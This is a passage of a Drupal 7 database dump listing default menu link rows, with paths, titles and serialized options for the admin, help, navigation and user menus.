account','a:0:{}','system',-1,0,0,0,0,2,0,2,10,0,0,0,0,0,0,0,0),('management',11,1,'admin/dashboard','admin/dashboard','Dashboard','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View and customize your dashboard.\";}}','system',0,0,0,0,-15,2,0,1,11,0,0,0,0,0,0,0,0),('management',12,1,'admin/help','admin/help','Help','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Reference for usage, configuration, and modules.\";}}','system',0,0,0,0,9,2,0,1,12,0,0,0,0,0,0,0,0),('management',13,1,'admin/index','admin/index','Index','a:0:{}','system',-1,0,0,0,-18,2,0,1,13,0,0,0,0,0,0,0,0),('user-menu',14,2,'user/login','user/login','Log in','a:0:{}','system',-1,0,0,0,0,2,0,2,14,0,0,0,0,0,0,0,0),('user-menu',15,0,'user/logout','user/logout','Log out','a:0:{}','system',0,0,0,0,10,1,0,15,0,0,0,0,0,0,0,0,0),('management',16,1,'admin/modules','admin/modules','Modules','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:26:\"Extend site functionality.\";}}','system',0,0,0,0,-2,2,0,1,16,0,0,0,0,0,0,0,0),('navigation',17,0,'user/%','user/%','My account','a:0:{}','system',0,0,1,0,0,1,0,17,0,0,0,0,0,0,0,0,0),('management',18,1,'admin/people','admin/people','People','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Manage user accounts, roles, and permissions.\";}}','system',0,0,0,0,-4,2,0,1,18,0,0,0,0,0,0,0,0),('management',19,1,'admin/reports','admin/reports','Reports','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View reports, updates, and errors.\";}}','system',0,0,1,0,5,2,0,1,19,0,0,0,0,0,0,0,0),('user-menu',20,2,'user/password','user/password','Request new password','a:0:{}','system',-1,0,0,0,0,2,0,2,20,0,0,0,0,0,0,0,0),('management',21,1,'admin/structure','admin/structure','Structure','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Administer blocks, content types, menus, etc.\";}}','system',0,0,1,0,-8,2,0,1,21,0,0,0,0,0,0,0,0),('management',22,1,'admin/tasks','admin/tasks','Tasks','a:0:{}','system',-1,0,0,0,-20,2,0,1,22,0,0,0,0,0,0,0,0),('navigation',23,0,'comment/reply/%','comment/reply/%','Add new comment','a:0:{}','system',0,0,0,0,0,1,0,23,0,0,0,0,0,0,0,0,0),('navigation',24,3,'comment/%/approve','comment/%/approve','Approve','a:0:{}','system',0,0,0,0,1,2,0,3,24,0,0,0,0,0,0,0,0),('navigation',25,3,'comment/%/delete','comment/%/delete','Delete','a:0:{}','system',-1,0,0,0,2,2,0,3,25,0,0,0,0,0,0,0,0),('navigation',26,3,'comment/%/edit','comment/%/edit','Edit','a:0:{}','system',-1,0,0,0,0,2,0,3,26,0,0,0,0,0,0,0,0),('navigation',27,0,'taxonomy/term/%','taxonomy/term/%','Taxonomy term','a:0:{}','system',0,0,0,0,0,1,0,27,0,0,0,0,0,0,0,0,0),('navigation',28,3,'comment/%/view','comment/%/view','View comment','a:0:{}','system',-1,0,0,0,-10,2,0,3,28,0,0,0,0,0,0,0,0),('management',29,18,'admin/people/create','admin/people/create','Add user','a:0:{}','system',-1,0,0,0,0,3,0,1,18,29,0,0,0,0,0,0,0),('management',30,21,'admin/structure/block','admin/structure/block','Blocks','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:79:\"Configure what block content appears in your site\'s sidebars and other regions.\";}}','system',0,0,1,0,0,3,0,1,21,30,0,0,0,0,0,0,0),('navigation',31,17,'user/%/cancel','user/%/cancel','Cancel account','a:0:{}','system',0,0,1,0,0,2,0,17,31,0,0,0,0,0,0,0,0),('management',32,9,'admin/content/comment','admin/content/comment','Comments','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:59:\"List and edit site comments and the comment approval queue.\";}}','system',0,0,0,0,0,3,0,1,9,32,0,0,0,0,0,0,0),('management',33,11,'admin/dashboard/configure','admin/dashboard/configure','Configure available dashboard blocks','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:53:\"Configure which blocks can be shown on the dashboard.\";}}','system',-1,0,0,0,0,3,0,1,11,33,0,0,0,0,0,0,0),('management',34,9,'admin/content/node','admin/content/node','Content','a:0:{}','system',-1,0,0,0,-10,3,0,1,9,34,0,0,0,0,0,0,0),('management',35,8,'admin/config/content','admin/config/content','Content authoring','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:53:\"Settings related to formatting and authoring content.\";}}','system',0,0,1,0,-15,3,0,1,8,35,0,0,0,0,0,0,0),('management',36,21,'admin/structure/types','admin/structure/types','Content types','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:92:\"Manage content types, including default status, front page promotion, comment settings, etc.\";}}','system',0,0,1,0,0,3,0,1,21,36,0,0,0,0,0,0,0),('management',37,11,'admin/dashboard/customize','admin/dashboard/customize','Customize dashboard','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:25:\"Customize your dashboard.\";}}','system',-1,0,0,0,0,3,0,1,11,37,0,0,0,0,0,0,0),('navigation',38,5,'node/%/delete','node/%/delete','Delete','a:0:{}','system',-1,0,0,0,1,2,0,5,38,0,0,0,0,0,0,0,0),('management',39,8,'admin/config/development','admin/config/development','Development','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:18:\"Development tools.\";}}','system',0,0,1,0,-10,3,0,1,8,39,0,0,0,0,0,0,0),('navigation',40,17,'user/%/edit','user/%/edit','Edit','a:0:{}','system',-1,0,0,0,0,2,0,17,40,0,0,0,0,0,0,0,0),('navigation',41,5,'node/%/edit','node/%/edit','Edit','a:0:{}','system',-1,0,0,0,0,2,0,5,41,0,0,0,0,0,0,0,0),('management',42,19,'admin/reports/fields','admin/reports/fields','Field list','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:39:\"Overview of fields on all entity types.\";}}','system',0,0,0,0,0,3,0,1,19,42,0,0,0,0,0,0,0),('management',43,7,'admin/appearance/list','admin/appearance/list','List','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:31:\"Select and configure your theme\";}}','system',-1,0,0,0,-1,3,0,1,7,43,0,0,0,0,0,0,0),('management',44,16,'admin/modules/list','admin/modules/list','List','a:0:{}','system',-1,0,0,0,0,3,0,1,16,44,0,0,0,0,0,0,0),('management',45,18,'admin/people/people','admin/people/people','List','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:50:\"Find and manage people interacting with your site.\";}}','system',-1,0,0,0,-10,3,0,1,18,45,0,0,0,0,0,0,0),('management',46,8,'admin/config/media','admin/config/media','Media','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:12:\"Media tools.\";}}','system',0,0,1,0,-10,3,0,1,8,46,0,0,0,0,0,0,0),('management',47,21,'admin/structure/menu','admin/structure/menu','Menus','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:86:\"Add new menus to your site, edit existing menus, and rename and reorganize menu links.\";}}','system',0,0,1,0,0,3,0,1,21,47,0,0,0,0,0,0,0),('management',48,8,'admin/config/people','admin/config/people','People','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:24:\"Configure user accounts.\";}}','system',0,0,1,0,-20,3,0,1,8,48,0,0,0,0,0,0,0),('management',49,18,'admin/people/permissions','admin/people/permissions','Permissions','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:64:\"Determine access to features by selecting permissions for roles.\";}}','system',-1,0,0,0,0,3,0,1,18,49,0,0,0,0,0,0,0),('management',50,19,'admin/reports/dblog','admin/reports/dblog','Recent log messages','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"View events that have recently been logged.\";}}','system',0,0,0,0,-1,3,0,1,19,50,0,0,0,0,0,0,0),('management',51,8,'admin/config/regional','admin/config/regional','Regional and language','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Regional settings, localization and translation.\";}}','system',0,0,1,0,-5,3,0,1,8,51,0,0,0,0,0,0,0),('navigation',52,5,'node/%/revisions','node/%/revisions','Revisions','a:0:{}','system',-1,0,1,0,2,2,0,5,52,0,0,0,0,0,0,0,0),('management',53,8,'admin/config/search','admin/config/search','Search and metadata','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:36:\"Local site search, metadata and SEO.\";}}','system',0,0,1,0,-10,3,0,1,8,53,0,0,0,0,0,0,0),('management',54,7,'admin/appearance/settings','admin/appearance/settings','Settings','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:46:\"Configure default and theme specific settings.\";}}','system',-1,0,0,0,20,3,0,1,7,54,0,0,0,0,0,0,0),('management',55,19,'admin/reports/status','admin/reports/status','Status report','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:74:\"Get a status report about your site\'s operation and any detected problems.\";}}','system',0,0,0,0,-60,3,0,1,19,55,0,0,0,0,0,0,0),('management',56,8,'admin/config/system','admin/config/system','System','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:37:\"General system related configuration.\";}}','system',0,0,1,0,-20,3,0,1,8,56,0,0,0,0,0,0,0),('management',57,21,'admin/structure/taxonomy','admin/structure/taxonomy','Taxonomy','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:67:\"Manage tagging, categorization, and classification of your content.\";}}','system',0,0,1,0,0,3,0,1,21,57,0,0,0,0,0,0,0),('management',58,19,'admin/reports/access-denied','admin/reports/access-denied','Top \'access denied\' errors','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:35:\"View \'access denied\' errors (403s).\";}}','system',0,0,0,0,0,3,0,1,19,58,0,0,0,0,0,0,0),('management',59,19,'admin/reports/page-not-found','admin/reports/page-not-found','Top \'page not found\' errors','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:36:\"View \'page not found\' errors (404s).\";}}','system',0,0,0,0,0,3,0,1,19,59,0,0,0,0,0,0,0),('management',60,16,'admin/modules/uninstall','admin/modules/uninstall','Uninstall','a:0:{}','system',-1,0,0,0,20,3,0,1,16,60,0,0,0,0,0,0,0),('management',61,8,'admin/config/user-interface','admin/config/user-interface','User interface','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:38:\"Tools that enhance the user interface.\";}}','system',0,0,1,0,-15,3,0,1,8,61,0,0,0,0,0,0,0),('navigation',62,5,'node/%/view','node/%/view','View','a:0:{}','system',-1,0,0,0,-10,2,0,5,62,0,0,0,0,0,0,0,0),('navigation',63,17,'user/%/view','user/%/view','View','a:0:{}','system',-1,0,0,0,-10,2,0,17,63,0,0,0,0,0,0,0,0),('management',64,8,'admin/config/services','admin/config/services','Web services','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:30:\"Tools related to web services.\";}}','system',0,0,1,0,0,3,0,1,8,64,0,0,0,0,0,0,0),('management',65,8,'admin/config/workflow','admin/config/workflow','Workflow','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"Content workflow, editorial workflow tools.\";}}','system',0,0,0,0,5,3,0,1,8,65,0,0,0,0,0,0,0),('management',66,12,'admin/help/block','admin/help/block','block','a:0:{}','system',-1,0,0,0,0,3,0,1,12,66,0,0,0,0,0,0,0),('management',67,12,'admin/help/color','admin/help/color','color','a:0:{}','system',-1,0,0,0,0,3,0,1,12,67,0,0,0,0,0,0,0),('management',68,12,'admin/help/comment','admin/help/comment','comment','a:0:{}','system',-1,0,0,0,0,3,0,1,12,68,0,0,0,0,0,0,0),('management',69,12,'admin/help/contextual','admin/help/contextual','contextual','a:0:{}','system',-1,0,0,0,0,3,0,1,12,69,0,0,0,0,0,0,0),('management',70,12,'admin/help/dashboard','admin/help/dashboard','dashboard','a:0:{}','system',-1,0,0,0,0,3,0,1,12,70,0,0,0,0,0,0,0),('management',71,12,'admin/help/dblog','admin/help/dblog','dblog','a:0:{}','system',-1,0,0,0,0,3,0,1,12,71,0,0,0,0,0,0,0),('management',72,12,'admin/help/field','admin/help/field','field','a:0:{}','system',-1,0,0,0,0,3,0,1,12,72,0,0,0,0,0,0,0),('management',73,12,'admin/help/field_sql_storage','admin/help/field_sql_storage','field_sql_storage','a:0:{}','system',-1,0,0,0,0,3,0,1,12,73,0,0,0,0,0,0,0),('management',74,12,'admin/help/field_ui','admin/help/field_ui','field_ui','a:0:{}','system',-1,0,0,0,0,3,0,1,12,74,0,0,0,0,0,0,0),('management',75,12,'admin/help/file','admin/help/file','file','a:0:{}','system',-1,0,0,0,0,3,0,1,12,75,0,0,0,0,0,0,0),('management',76,12,'admin/help/filter','admin/help/filter','filter','a:0:{}','system',-1,0,0,0,0,3,0,1,12,76,0,0,0,0,0,0,0),('management',77,12,'admin/help/help','admin/help/help','help','a:0:{}','system',-1,0,0,0,0,3,0,1,12,77,0,0,0,0,0,0,0),('management',78,12,'admin/help/image','admin/help/image','image','a:0:{}','system',-1,0,0,0,0,3,0,1,12,78,0,0,0,0,0,0,0),('management',79,12,'admin/help/list','admin/help/list','list','a:0:{}','system',-1,0,0,0,0,3,0,1,12,79,0,0,0,0,0,0,0),('management',80,12,'admin/help/menu','admin/help/menu','menu','a:0:{}','system',-1,0,0,0,0,3,0,1,12,80,0,0,0,0,0,0,0),('management',81,12,'admin/help/node','admin/help/node','node','a:0:{}','system',-1,0,0,0,0,3,0,1,12,81,0,0,0,0,0,0,0),('management',82,12,'admin/help/options','admin/help/options','options','a:0:{}','system',-1,0,0,0,0,3,0,1,12,82,0,0,0,0,0,0,0),('management',83,12,'admin/help/system','admin/help/system','system','a:0:{}','system',-1,0,0,0,0,3,0,1,12,83,0,0,0,0,0,0,0),('management',84,12,'admin/help/taxonomy','admin/help/taxonomy','taxonomy','a:0:{}','system',-1,0,0,0,0,3,0,1,12,84,0,0,0,0,0,0,0),('management',85,12,'admin/help/text','admin/help/text','text','a:0:{}','system',-1,0,0,0,0,3,0,1,12,85,0,0,0,0,0,0,0),('management',86,12,'admin/help/user','admin/help/user','user','a:0:{}','system',-1,0,0,0,0,3,0,1,12,86,0,0,0,0,0,0,0),('navigation',87,27,'taxonomy/term/%/edit','taxonomy/term/%/edit','Edit','a:0:{}','system',-1,0,0,0,10,2,0,27,87,0,0,0,0,0,0,0,0),('navigation',88,27,'taxonomy/term/%/view','taxonomy/term/%/view','View','a:0:{}','system',-1,0,0,0,0,2,0,27,88,0,0,0,0,0,0,0,0),('management',89,57,'admin/structure/taxonomy/%','admin/structure/taxonomy/%','','a:0:{}','system',0,0,0,0,0,4,0,1,21,57,89,0,0,0,0,0,0),('management',90,48,'admin/config/people/accounts','admin/config/people/accounts','Account settings','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:109:\"Configure default behavior of users, including registration requirements, e-mails, fields, and user pictures.\";}}','system',0,0,0,0,-10,4,0,1,8,48,90,0,0,0,0,0,0),('management',91,56,'admin/config/system/actions','admin/config/system/actions','Actions','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:41:\"Manage the actions defined for your site.\";}}','system',0,0,1,0,0,4,0,1,8,56,91,0,0,0,0,0,0),('management',92,30,'admin/structure/block/add','admin/structure/block/add','Add block','a:0:{}','system',-1,0,0,0,0,4,0,1,21,30,92,0,0,0,0,0,0),('management',93,36,'admin/structure/types/add','admin/structure/types/add','Add content type','a:0:{}','system',-1,0,0,0,0,4,0,1,21,36,93,0,0,0,0,0,0),('management',94,47,'admin/structure/menu/add','admin/structure/menu/add','Add menu','a:0:{}','system',-1,0,0,0,0,4,0,1,21,47,94,0,0,0,0,0,0),('management',95,57,'admin/structure/taxonomy/add','admin/structure/taxonomy/add','Add vocabulary','a:0:{}','system',-1,0,0,0,0,4,0,1,21,57,95,0,0,0,0,0,0),('management',96,54,'admin/appearance/settings/bartik','admin/appearance/settings/bartik','Bartik','a:0:{}','system',-1,0,0,0,0,4,0,1,7,54,96,0,0,0,0,0,0),('management',97,53,'admin/config/search/clean-urls','admin/config/search/clean-urls','Clean URLs','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"Enable or disable clean URLs for your site.\";}}','system',0,0,0,0,5,4,0,1,8,53,97,0,0,0,0,0,0),('management',98,56,'admin/config/system/cron','admin/config/system/cron','Cron','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:40:\"Manage automatic site maintenance tasks.\";}}','system',0,0,0,0,20,4,0,1,8,56,98,0,0,0,0,0,0),('management',99,51,'admin/config/regional/date-time','admin/config/regional/date-time','Date and time','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:44:\"Configure display formats for date and time.\";}}','system',0,0,0,0,-15,4,0,1,8,51,99,0,0,0,0,0,0),('management',100,19,'admin/reports/event/%','admin/reports/event/%','Details','a:0:{}','system',0,0,0,0,0,3,0,1,19,100,0,0,0,0,0,0,0),('management',101,46,'admin/config/media/file-system','admin/config/media/file-system','File system','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:68:\"Tell Drupal where to store uploaded files and how they are accessed.\";}}','system',0,0,0,0,-10,4,0,1,8,46,101,0,0,0,0,0,0),('management',102,54,'admin/appearance/settings/garland','admin/appearance/settings/garland','Garland','a:0:{}','system',-1,0,0,0,0,4,0,1,7,54,102,0,0,0,0,0,0),('management',103,54,'admin/appearance/settings/global','admin/appearance/settings/global','Global settings','a:0:{}','system',-1,0,0,0,-1,4,0,1,7,54,103,0,0,0,0,0,0),('management',104,48,'admin/config/people/ip-blocking','admin/config/people/ip-blocking','IP address blocking','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:28:\"Manage blocked IP addresses.\";}}','system',0,0,1,0,10,4,0,1,8,48,104,0,0,0,0,0,0),('management',105,46,'admin/config/media/image-styles','admin/config/media/image-styles','Image styles','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:78:\"Configure styles that can be used for resizing or adjusting images on display.\";}}','system',0,0,1,0,0,4,0,1,8,46,105,0,0,0,0,0,0),('management',106,46,'admin/config/media/image-toolkit','admin/config/media/image-toolkit','Image toolkit','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:74:\"Choose which image toolkit to use if you have installed optional toolkits.\";}}','system',0,0,0,0,20,4,0,1,8,46,106,0,0,0,0,0,0),('management',107,44,'admin/modules/list/confirm','admin/modules/list/confirm','List','a:0:{}','system',-1,0,0,0,0,4,0,1,16,44,107,0,0,0,0,0,0),('management',108,36,'admin/structure/types/list','admin/structure/types/list','List','a:0:{}','system',-1,0,0,0,-10,4,0,1,21,36,108,0,0,0,0,0,0),('management',109,57,'admin/structure/taxonomy/list','admin/structure/taxonomy/list','List','a:0:{}','system',-1,0,0,0,-10,4,0,1,21,57,109,0,0,0,0,0,0),('management',110,47,'admin/structure/menu/list','admin/structure/menu/list','List menus','a:0:{}','system',-1,0,0,0,-10,4,0,1,21,47,110,0,0,0,0,0,0),('management',111,39,'admin/config/development/logging','admin/config/development/logging','Logging and errors','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:154:\"Settings for logging and alerts modules. Various modules can route Drupal\'s system events to different destinations, such as syslog, database, email, etc.\";}}','system',0,0,0,0,-15,4,0,1,8,39,111,0,0,0,0,0,0),('management',112,39,'admin/config/development/maintenance','admin/config/development/maintenance','Maintenance mode','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:62:\"Take the site offline for maintenance or bring it back online.\";}}','system',0,0,0,0,-10,4,0,1,8,39,112,0,0,0,0,0,0),('management',113,39,'admin/config/development/performance','admin/config/development/performance','Performance','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:101:\"Enable or disable page caching for anonymous users and set CSS and JS bandwidth optimization options.\";}}','system',0,0,0,0,-20,4,0,1,8,39,113,0,0,0,0,0,0),('management',114,49,'admin/people/permissions/list','admin/people/permissions/list','Permissions','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:64:\"Determine access to features by selecting permissions for roles.\";}}','system',-1,0,0,0,-8,4,0,1,18,49,114,0,0,0,0,0,0),('management',115,32,'admin/content/comment/new','admin/content/comment/new','Published comments','a:0:{}','system',-1,0,0,0,-10,4,0,1,9,32,115,0,0,0,0,0,0),('management',116,64,'admin/config/services/rss-publishing','admin/config/services/rss-publishing','RSS publishing','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:114:\"Configure the site description, the number of items per feed and whether feeds should be titles/teasers/full-text.\";}}','system',0,0,0,0,0,4,0,1,8,64,116,0,0,0,0,0,0),('management',117,51,'admin/config/regional/settings','admin/config/regional/settings','Regional settings','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:54:\"Settings for the site\'s default time zone and country.\";}}','system',0,0,0,0,-20,4,0,1,8,51,117,0,0,0,0,0,0),('management',118,49,'admin/people/permissions/roles','admin/people/permissions/roles','Roles','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:30:\"List, edit, or add user roles.\";}}','system',-1,0,1,0,-5,4,0,1,18,49,118,0,0,0,0,0,0),('management',119,47,'admin/structure/menu/settings','admin/structure/menu/settings','Settings','a:0:{}','system',-1,0,0,0,5,4,0,1,21,47,119,0,0,0,0,0,0),('management',120,54,'admin/appearance/settings/seven','admin/appearance/settings/seven','Seven','a:0:{}','system',-1,0,0,0,0,4,0,1,7,54,120,0,0,0,0,0,0),('management',121,56,'admin/config/system/site-information','admin/config/system/site-information','Site information','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:104:\"Change site name, e-mail address, slogan, default front page, and number of posts per page, error pages.\";}}','system',0,0,0,0,-20,4,0,1,8,56,121,0,0,0,0,0,0),('management',122,54,'admin/appearance/settings/stark','admin/appearance/settings/stark','Stark','a:0:{}','system',-1,0,0,0,0,4,0,1,7,54,122,0,0,0,0,0,0),('management',123,35,'admin/config/content/formats','admin/config/content/formats','Text formats','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:127:\"Configure how content input by users is filtered, including allowed HTML tags. Also allows enabling of module-provided filters.\";}}','system',0,0,1,0,0,4,0,1,8,35,123,0,0,0,0,0,0),('management',124,32,'admin/content/comment/approval','admin/content/comment/approval','Unapproved comments','a:0:{}','system',-1,0,0,0,0,4,0,1,9,32,124,0,0,0,0,0,0),('management',125,60,'admin/modules/uninstall/confirm','admin/modules/uninstall/confirm','Uninstall','a:0:{}','system',-1,0,0,0,0,4,0,1,16,60,125,0,0,0,0,0,0),('navigation',126,40,'user/%/edit/account','user/%/edit/account','Account','a:0:{}','system',-1,0,0,0,0,3,0,17,40,126,0,0,0,0,0,0,0),('management',127,123,'admin/config/content/formats/%','admin/config/content/formats/%','','a:0:{}','system',0,0,1,0,0,5,0,1,8,35,123,127,0,0,0,0,0),('management',128,105,'admin/config/media/image-styles/add','admin/config/media/image-styles/add','Add style','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:22:\"Add a new image style.\";}}','system',-1,0,0,0,2,5,0,1,8,46,105,128,0,0,0,0,0),('management',129,89,'admin/structure/taxonomy/%/add','admin/structure/taxonomy/%/add','Add term','a:0:{}','system',-1,0,0,0,0,5,0,1,21,57,89,129,0,0,0,0,0),('management',130,123,'admin/config/content/formats/add','admin/config/content/formats/add','Add text format','a:0:{}','system',-1,0,0,0,1,5,0,1,8,35,123,130,0,0,0,0,0),('management',131,30,'admin/structure/block/list/bartik','admin/structure/block/list/bartik','Bartik','a:0:{}','system',-1,0,0,0,0,4,0,1,21,30,131,0,0,0,0,0,0),('management',132,91,'admin/config/system/actions/configure','admin/config/system/actions/configure','Configure an advanced action','a:0:{}','system',-1,0,0,0,0,5,0,1,8,56,91,132,0,0,0,0,0),('management',133,47,'admin/structure/menu/manage/%','admin/structure/menu/manage/%','Customize menu','a:0:{}','system',0,0,1,0,0,4,0,1,21,47,133,0,0,0,0,0,0),('management',134,89,'admin/structure/taxonomy/%/edit','admin/structure/taxonomy/%/edit','Edit','a:0:{}','system',-1,0,0,0,-10,5,0,1,21,57,89,134,0,0,0,0,0),('management',135,36,'admin/structure/types/manage/%','admin/structure/types/manage/%','Edit content type','a:0:{}','system',0,0,1,0,0,4,0,1,21,36,135,0,0,0,0,0,0),('management',136,99,'admin/config/regional/date-time/formats','admin/config/regional/date-time/formats','Formats','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:51:\"Configure display format strings for date and time.\";}}','system',-1,0,1,0,-9,5,0,1,8,51,99,136,0,0,0,0,0),('management',137,30,'admin/structure/block/list/garland','admin/structure/block/list/garland','Garland','a:0:{}','system',-1,0,0,0,0,4,0,1,21,30,137,0,0,0,0,0,0),('management',138,123,'admin/config/content/formats/list','admin/config/content/formats/list','List','a:0:{}','system',-1,0,0,0,0,5,0,1,8,35,123,138,0,0,0,0,0),('management',139,89,'admin/structure/taxonomy/%/list','admin/structure/taxonomy/%/list','List','a:0:{}','system',-1,0,0,0,-20,5,0,1,21,57,89,139,0,0,0,0,0),('management',140,105,'admin/config/media/image-styles/list','admin/config/media/image-styles/list','List','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:42:\"List the current image styles on the site.\";}}','system',-1,0,0,0,1,5,0,1,8,46,105,140,0,0,0,0,0),('management',141,91,'admin/config/system/actions/manage','admin/config/system/actions/manage','Manage actions','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:41:\"Manage the actions defined for your site.\";}}','system',-1,0,0,0,-2,5,0,1,8,56,91,141,0,0,0,0,0),('management',142,90,'admin/config/people/accounts/settings','admin/config/people/accounts/settings','Settings','a:0:{}','system',-1,0,0,0,-10,5,0,1,8,48,90,142,0,0,0,0,0),('management',143,30,'admin/structure/block/list/seven','admin/structure/block/list/seven','Seven','a:0:{}','system',-1,0,0,0,0,4,0,1,21,30,143,0,0,0,0,0,0),('management',144,30,'admin/structure/block/list/stark','admin/structure/block/list/stark','Stark','a:0:{}','system',-1,0,0,0,0,4,0,1,21,30,144,0,0,0,0,0,0),('management',145,99,'admin/config/regional/date-time/types','admin/config/regional/date-time/types','Types','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:44:\"Configure display formats for date and time.\";}}','system',-1,0,1,0,-10,5,0,1,8,51,99,145,0,0,0,0,0),('navigation',146,52,'node/%/revisions/%/delete','node/%/revisions/%/delete','Delete earlier revision','a:0:{}','system',0,0,0,0,0,3,0,5,52,146,0,0,0,0,0,0,0),('navigation',147,52,'node/%/revisions/%/revert','node/%/revisions/%/revert','Revert to earlier revision','a:0:{}','system',0,0,0,0,0,3,0,5,52,147,0,0,0,0,0,0,0),('navigation',148,52,'node/%/revisions/%/view','node/%/revisions/%/view','Revisions','a:0:{}','system',0,0,0,0,0,3,0,5,52,148,0,0,0,0,0,0,0),('management',149,137,'admin/structure/block/list/garland/add','admin/structure/block/list/garland/add','Add block','a:0:{}','system',-1,0,0,0,0,5,0,1,21,30,137,149,0,0,0,0,0),('management',150,143,'admin/structure/block/list/seven/add','admin/structure/block/list/seven/add','Add block','a:0:{}','system',-1,0,0,0,0,5,0,1,21,30,143,150,0,0,0,0,0),('management',151,144,'admin/structure/block/list/stark/add','admin/structure/block/list/stark/add','Add block','a:0:{}','system',-1,0,0,0,0,5,0,1,21,30,144,151,0,0,0,0,0),('management',152,145,'admin/config/regional/date-time/types/add','admin/config/regional/date-time/types/add','Add date type','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:18:\"Add new date type.\";}}','system',-1,0,0,0,-10,6,0,1,8,51,99,145,152,0,0,0,0),('management',153,136,'admin/config/regional/date-time/formats/add','admin/config/regional/date-time/formats/add','Add format','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"Allow users to add additional date formats.\";}}','system',-1,0,0,0,-10,6,0,1,8,51,99,136,153,0,0,0,0),('management',154,133,'admin/structure/menu/manage/%/add','admin/structure/menu/manage/%/add','Add link','a:0:{}','system',-1,0,0,0,0,5,0,1,21,47,133,154,0,0,0,0,0),('management',155,30,'admin/structure/block/manage/%/%','admin/structure/block/manage/%/%','Configure block','a:0:{}','system',0,0,0,0,0,4,0,1,21,30,155,0,0,0,0,0,0),('navigation',156,31,'user/%/cancel/confirm/%/%','user/%/cancel/confirm/%/%','Confirm account cancellation','a:0:{}','system',0,0,0,0,0,3,0,17,31,156,0,0,0,0,0,0,0),('management',157,135,'admin/structure/types/manage/%/delete','admin/structure/types/manage/%/delete','Delete','a:0:{}','system',0,0,0,0,0,5,0,1,21,36,135,157,0,0,0,0,0),('management',158,104,'admin/config/people/ip-blocking/delete/%','admin/config/people/ip-blocking/delete/%','Delete IP address','a:0:{}','system',0,0,0,0,0,5,0,1,8,48,104,158,0,0,0,0,0),('management',159,91,'admin/config/system/actions/delete/%','admin/config/system/actions/delete/%','Delete action','a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:17:\"Delete an action.\";}}','system',0,0,0,0,0,5,0,1,8,56,91,159,0,0,0,0,0),('management',160,133,'admin/structure/menu/manage/%/delete','admin/structure/menu/manage/%/delete','Delete menu','a:0:{}','system',0,0,0,0,0,5,0,1,21,47,133,160,0,0,0,0,0),('management',161,47,'admin/structure/menu/item/%/delete','admin/structure/menu/item/%/delete','Delete menu link','a:0:{}','system',0,0,0,0,0,4,0,1,21,47,161,0,0,0,0,0,0),('management',162,118,'admin/people/permissions/roles/delete/%','admin/people/permissions/roles/delete/%','Delete role','a:0:{}','system',0,0,0,0,0,5,0,1,18,49,118,162,0,0,0,0,0),('management',163,127,'admin/config/content/formats/%/disable','admin/config/content/formats/%/disable','Disable text format','a:0:{}','system',0,0,0,0,0,6,0,1,8,35,123,127,163,0,0,0,0),('management',164,135,'admin/structure/types/manage/%/edit','admin/structure/types/manage/%/edit','Edit','a:0:{}','system',-1,0,0,0,0,5,0,1,21,36,135,164,0,0,0,0,0),('management',165,133,'admin/structure/menu/manage/%/edit','admin/structure/menu/manage/%/edit','Edit 